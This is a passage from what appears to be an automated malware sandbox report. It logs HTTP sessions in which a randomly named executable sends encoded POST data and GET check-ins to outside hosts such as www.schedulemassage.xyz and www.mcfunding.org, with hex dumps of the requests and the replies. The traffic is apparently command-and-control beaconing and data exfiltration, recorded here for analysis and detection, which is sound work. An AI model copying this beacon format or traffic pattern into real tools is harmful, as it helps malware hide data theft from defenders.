                                                                                                        Data Raw: 44 44 70 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 36 4c 65 78 61 58 6e 45 6b 73 52 42 6a 45 4b 54 49 70 33 2f 52 76 71 47 70 79 76 6b 57 77 65 48 6a 49 4e 41 55 4d 59 7a 2f 66 38 64 51 70 57 74 72 2f 32 79 69 4c 78 43 34 73 58 6b 61 50 64 51 77 46 37 4e 4e 2f 56 4a 54 64 6b 53 42 54 6f 61 43 64 42 46 34 4c 6e 72 48 4c 62 74 65 30 67 71 59 6f 61 34 64 37 54 6f 7a 66 6a 76 52 6a 54 42 74 32 44 57 6f 31 4a 57 49 5a 79 53 65 50 54 77 58 37 71 42 53 65 6b 50 74 39 49 43 73 63 6b 7a 56 2b 67 4e 4d 35 45 71 63 68 59 30 61 70 78 73 57 70 65 46 44 59 4f 4e 71 74 71 2f 65 66 6d 32 49 45 4a 6a 65 70 34 51 3d 3d
                                                                                                        Data Ascii: DDp=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICsckzV+gNM5EqchY0apxsWpeFDYONqtq/efm2IEJjep4Q==
                                                                                                        Nov 6, 2024 08:40:15.511419058 CET533INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:40:15 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.649989203.161.49.193804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:17.389429092 CET1859OUTPOST /hxmz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.futurevision.life
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.futurevision.life
                                                                                                        Referer: http://www.futurevision.life/hxmz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 79 4c 65 47 79 58 6d 6a 34 73 51 42 6a 45 4a 54 49 6f 33 2f 52 32 71 47 68 32 76 6a 65 47 65 42 76 49 4e 69 63 4d 66 47 44 66 32 64 51 70 4c 39 72 2b 35 53 69 65 78 43 6f 67 58 6b 4b 50 64 51 77 46 37 4f 56 2f 53 59 54 64 6d 53 42 4d 76 61 43 76 51 56 34 76 6e 76 72 39 62 74 54 42 67 61 34 6f 61 65 39 37 65 2b 66 66 76 76 52 32 51 42 74 51 44 57 55 51 4a 57 55 6a 79 53 43 78 54 7a 4c 37 70 6b 4b 49 77 62 5a 6d 64 6a 68 77 77 41 55 55 6a 34 49 6f 41 71 67 69 58 56 75 65 31 4f 4c 4b 5a 46 7a 55 46 62 33 33 6f 4f 4f 47 68 47 31 71 4d 7a 62 58 71 5a 33 43 57 63 42 48 49 6b 75 6e 73 6e 66 6e 62 5a 78 52 6a 4f 59 67 68 6d 6e 33 50 70 35 51 38 6e 45 4a 6d 45 4a 41 59 30 4e 45 74 79 6b 30 31 52 4a 2f 32 6f 48 49 2f 72 39 63 45 64 37 4c 4e 71 55 74 38 6a 67 59 6e 33 67 6f 4e 74 38 4e 6b 42 39 77 50 32 41 48 4e 2b 30 4e 57 6c 4d 70 52 38 73 77 7a 57 6a 76 67 32 4d 6d 4c 43 [TRUNCATED]
                                                                                                        Data Ascii: DDp=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/yLeGyXmj4sQBjEJTIo3/R2qGh2vjeGeBvINicMfGDf2dQpL9r+5SiexCogXkKPdQwF7OV/SYTdmSBMvaCvQV4vnvr9btTBga4oae97e+ffvvR2QBtQDWUQJWUjySCxTzL7pkKIwbZmdjhwwAUUj4IoAqgiXVue1OLKZFzUFb33oOOGhG1qMzbXqZ3CWcBHIkunsnfnbZxRjOYghmn3Pp5Q8nEJmEJAY0NEtyk01RJ/2oHI/r9cEd7LNqUt8jgYn3goNt8NkB9wP2AHN+0NWlMpR8swzWjvg2MmLCQiPkmq1nOybW4UG/IflJibWXtAMOgtyIa8OlOXd6OvZUcZeHM1QNVLRfVxf7QqNe/f3tSq2m+2XOM1fvQTmz69qHgsF8KZYH6P6Q+fmvvNTiEJ7h/zWxg1KyH/e4GCX7NZClQ7o4btp6h+bAWtem4X7OOFUhypXVrDpSXyZDvPzVhTIYpt3Y4Moed2nEaBolFDIw7m9O26aFtjRKi9h0lJs1o8liItLYPQIKSKRgVW2rpRgVMZibNGqWH6vmKhPEf8qWJjoyPtqy7fEVdd9hYITwN0BKDpIpXC6R21NMHnJBGSQkOGVCIfy2RM/MzHewJJ69zlBz4ft8OW7CMbYG3aW9gxzMhQVLUGDU8UtKrlisEnFOLOLok6uc1uU5xLsKURByCF8+C7iWe3x0FknNmBnZoHQxxnlWGqVZ2aK7c+5UFESr1poxWVc2ywq66Pmc1EELBj03fQ1o8MXjA+vW7ac0MUOw7T3iyjocT6F4niQTTUDadkL8C1FAMvgHUkVlEy6nXMydnr6YA7IQEaQ5qayTmuSVzukpLX7dEFkA1bLTZSDwZlNco5C/bjScOURkqKacPmaZpiaEJTL5klYbS5EyAYi3F9tWP2cE34W7GrU82L6u5AkPftEGxVOZpGzObDXkQPxU+m7xADUzmOVqtGyjqAH5YD4aBl [TRUNCATED]
                                                                                                        Nov 6, 2024 08:40:18.071787119 CET533INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:40:17 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.649990203.161.49.193804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:19.932594061 CET554OUTGET /hxmz/?DDp=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.futurevision.life
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:40:20.633265972 CET548INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:40:20 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.6499913.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:25.759612083 CET828OUTPOST /slxp/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.schedulemassage.xyz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.schedulemassage.xyz
                                                                                                        Referer: http://www.schedulemassage.xyz/slxp/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 67 49 50 2b 59 57 57 6b 71 55 59 61 48 4f 42 5a 33 2b 32 69 6d 51 56 2f 41 4c 35 6d 68 39 36 6f 6e 69 69 34 71 78 52 54 42 36 6f 41 50 56 4b 4b 54 6d 46 69 61 2b 59 4d 53 6c 75 52 35 43 45 63 4e 4e 6d 52 75 4a 5a 46 33 74 6f 4b 6e 61 69 49 77 58 36 71 7a 72 65 59 44 6e 73 4e 72 6d 49 45 62 6d 2b 51 4d 57 65 36 53 5a 6e 5a 6c 35 42 41 62 61 42 71 4a 54 7a 64 31 6e 68 51 6a 65 5a 4f 69 79 55 59 32 61 76 35 4d 2f 38 47 59 79 33 66 6a 35 76 70 57 6e 36 33 4a 54 58 57 63 65 31 66 32 42 5a 37 41 2b 70 71 7a 65 31 78 44 72 35 39 4e 41 55 59 34 5a 32 78 4a 6f 4f 31 38 4d 50 5a
                                                                                                        Data Ascii: DDp=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpWn63JTXWce1f2BZ7A+pqze1xDr59NAUY4Z2xJoO18MPZ


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.6499933.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:28.310998917 CET852OUTPOST /slxp/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.schedulemassage.xyz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.schedulemassage.xyz
                                                                                                        Referer: http://www.schedulemassage.xyz/slxp/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 65 6f 6e 47 75 34 34 45 74 54 41 36 6f 41 58 46 4c 41 58 6d 46 31 61 2b 55 69 53 68 6d 52 35 43 41 63 4e 4a 69 52 75 36 78 47 74 64 6f 49 75 36 69 4f 39 33 36 71 7a 72 65 59 44 6a 45 72 72 6d 51 45 62 32 75 51 4e 30 6d 35 4e 70 6e 65 69 35 42 41 52 36 42 75 4a 54 7a 6a 31 69 34 59 6a 63 68 4f 69 33 77 59 32 4c 76 2b 44 2f 39 4e 63 79 32 30 6b 34 53 51 53 55 6a 4e 48 42 2f 4f 42 59 5a 4f 7a 33 45 68 63 4e 70 4a 68 4f 56 7a 44 70 68 50 4e 67 55 79 36 5a 4f 78 62 2f 43 53 7a 34 71 36 70 35 41 49 64 44 70 2b 72 62 6f 4a 4d 48 30 6b 65 30 68 71 74 67 3d 3d
                                                                                                        Data Ascii: DDp=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhOVzDphPNgUy6ZOxb/CSz4q6p5AIdDp+rboJMH0ke0hqtg==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.6499943.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:31.159502029 CET1865OUTPOST /slxp/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.schedulemassage.xyz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.schedulemassage.xyz
                                                                                                        Referer: http://www.schedulemassage.xyz/slxp/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 57 6f 6e 7a 79 34 70 58 46 54 44 36 6f 41 4a 56 4c 44 58 6d 45 33 61 2b 4d 75 53 68 69 72 35 45 63 63 4d 71 71 52 6f 4c 78 47 6a 74 6f 49 73 36 69 50 77 58 36 46 7a 72 4f 55 44 6e 67 72 72 6d 51 45 62 77 53 51 62 57 65 35 65 35 6e 5a 6c 35 42 63 62 61 42 47 4a 54 37 73 31 6a 4d 49 69 73 42 4f 6a 58 41 59 77 35 58 2b 63 50 39 50 62 79 32 73 6b 34 65 78 53 58 48 37 48 46 2f 77 42 65 6c 4f 78 52 35 4b 44 2b 6c 77 2f 4d 46 75 65 65 6b 6b 4b 6c 38 61 69 50 61 4d 66 73 4b 6b 78 5a 57 78 75 73 70 56 57 31 30 62 6a 38 30 69 53 68 56 44 53 6b 77 61 37 54 6b 34 4f 66 57 31 73 46 4d 50 69 34 50 6f 72 66 37 4d 41 4e 36 62 67 44 4b 37 6b 52 56 59 70 37 67 48 6b 33 6f 36 42 53 62 46 37 5a 4a 41 6f 7a 30 36 45 41 6d 38 58 4a 7a 32 35 77 76 59 78 4d 75 45 2f 41 67 6d 64 49 57 6b 46 39 66 44 37 39 78 66 36 34 57 4f 61 50 63 36 35 68 65 39 69 47 38 4e 74 36 6f 7a 58 30 75 41 43 63 [TRUNCATED]
                                                                                                        Data Ascii: DDp=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhvWonzy4pXFTD6oAJVLDXmE3a+MuShir5EccMqqRoLxGjtoIs6iPwX6FzrOUDngrrmQEbwSQbWe5e5nZl5BcbaBGJT7s1jMIisBOjXAYw5X+cP9Pby2sk4exSXH7HF/wBelOxR5KD+lw/MFueekkKl8aiPaMfsKkxZWxuspVW10bj80iShVDSkwa7Tk4OfW1sFMPi4Porf7MAN6bgDK7kRVYp7gHk3o6BSbF7ZJAoz06EAm8XJz25wvYxMuE/AgmdIWkF9fD79xf64WOaPc65he9iG8Nt6ozX0uACczOp01fFQY6rRVSB/Zyf8CqsDbpl+MXwtW6O7qRa2ZiznSXugUw0cdMW09V2w699TDEP0lF6mRbfwOprrmV3PV+/4I/k5K1LpI8ZBMmco4G405pgpeAHCXhkVbDsYauMmiTefod+5OAPbFIpbejBqKVX2ESzlLu7I+99oLknD7e6CTHYD6A2HrYaUdSqEahYvNbMtFJW0XRWjw4uWUb8J2I7Snv3m9Fr5i0bwUPmA1rg3IBMrbiTxRHJwl8xZcD2eSjm63c3kTKBdKIS2FedZPrBWv7KXu2i/nT1xL46GkwwpCIS7khin/ZSpM/MvOjP0VB+SMTO2aC7Z7Oh1O4CYnCCKIDzBNeYpwmbVOzmw0OQY4+2CgWBDvQ89HTHzqhpQmcBYzeZG7eQwEsGFWudQFWXJI4eMsfIjM0+d1mYaNZu0i3d8DBZ+XRR7he81yrJ+6Sr0n0RsOVnekvO83NKxUo9p66C0jif4Mu41r6MWdy7hCkG84XmgxzIsZiZEWsSwAxbulo3WbcjKSvIMzIqHPYt+GvV9WI/fSeB7umxlIEIx39flyFEpGcGzyZXykMBP/HKeD9rTF7+axKu5/uAucqCmuCcwze5+l5A/4l5xfrTIuEmfshXMpLxpWaaF58ramB2TqhHSpe1nf6U8IJZZYfXZh1Stc3tZct [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.6499953.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:33.744096994 CET556OUTGET /slxp/?DDp=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.schedulemassage.xyz
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:40:34.354901075 CET409INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Wed, 06 Nov 2024 07:40:34 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 269
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 44 70 3d 51 72 57 73 31 4d 47 62 59 79 51 46 6f 71 33 70 41 69 61 73 78 51 30 76 4a 59 45 30 7a 2f 76 61 77 54 5a 65 65 49 31 69 38 74 6d 38 6b 78 65 4e 34 6d 52 61 49 5a 51 71 44 6d 53 72 65 31 41 7a 4e 39 73 49 65 47 2b 50 78 51 34 31 45 4c 2b 58 71 6f 6c 4f 69 66 63 41 6f 36 2f 30 34 33 4f 73 31 62 69 6e 43 54 73 51 74 67 51 69 45 32 58 66 48 48 69 6b 64 66 7a 66 6a 4b 46 5a 52 2b 4e 71 4c 7a 50 55 2f 58 77 3d 26 53 76 72 4c 59 3d 33 50 38 6c 41 4c 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DDp=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&SvrLY=3P8lALA"}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.6499963.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:39.417275906 CET810OUTPOST /0598/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.mcfunding.org
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.mcfunding.org
                                                                                                        Referer: http://www.mcfunding.org/0598/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 4a 61 35 5a 30 6f 6d 6e 72 43 53 4a 78 65 5a 58 72 43 49 4e 65 6b 76 44 6a 6b 56 6e 35 4c 58 73 4b 58 4f 61 49 54 63 58 44 71 76 66 6a 4a 71 42 71 6e 7a 37 59 4a 4d 65 69 32 41 30 72 53 6f 72 65 46 2f 75 48 62 49 66 64 66 76 69 42 33 4f 54 50 64 64 71 78 31 2f 4a 6b 32 76 5a 46 64 6a 33 6a 67 76 37 45 74 33 52 6d 30 77 71 48 79 77 56 57 6b 70 6a 64 6c 48 42 57 51 72 41 52 51 52 69 77 2f 38 33 4b 6e 78 37 42 32 6e 48 72 34 62 38 31 30 67 76 37 77 6d 6e 57 36 4e 38 5a 4d 63 53 79 53 77 49 2f 56 34 79 69 6a 2f 43 64 63 36 2f 73 46 4e 61 57 32 75 5a 2b 76 59 4a 61 2b 4c
